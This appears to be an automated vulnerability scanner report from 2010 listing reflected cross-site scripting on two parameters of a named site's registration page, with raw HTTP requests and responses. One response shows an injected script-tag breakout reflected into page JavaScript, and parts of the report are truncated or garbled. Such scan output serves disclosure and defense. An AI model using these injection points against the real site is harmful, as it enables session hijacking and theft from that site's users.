1. Cross-site scripting (reflected)
1.1. https://secure.www.siliconvalley.com/registration/ [rPage parameter]
1.2. https://secure.www.siliconvalley.com/registration/ [url parameter]
Severity: | High |
Confidence: | Certain |
Host: | https://secure.www |
Path: | /registration/ |
GET /registration/?rPage Host: secure.www.siliconvalley Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 404 Not Found Date: Mon, 15 Nov 2010 02:09:40 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=LX5GZDZ3H Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> ...[SNIP]... rBrand = getBrand2(s_account); var PageName = "Registration"; var SectionName = "Registration"; var ArticleTitle = "null"; var FriendlyName = "Registration: login6715d</script><script var domainName = getDomainName(); userObj = new omniObj(); userObj.load(); userObj.update(); userObj.save(); /* You may give each page an identifying name, server, and cha ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://secure.www |
Path: | /registration/ |
GET /registration/?rPage Host: secure.www.siliconvalley Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.0 200 OK Date: Mon, 15 Nov 2010 02:09:41 GMT Server: Apache/2.0.52 (Red Hat) Set-Cookie: JSESSIONID=4ISA2QSZC Pragma: no-cache Cache-Control: no-cache Expires: Tue, 04 Dec 1993 21:29:02 GMT Content-Language: en-US Connection: close Content-Type: text/html;charset=UTF-8 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html> ...[SNIP]... <a href="/registration?rPage ...[SNIP]... |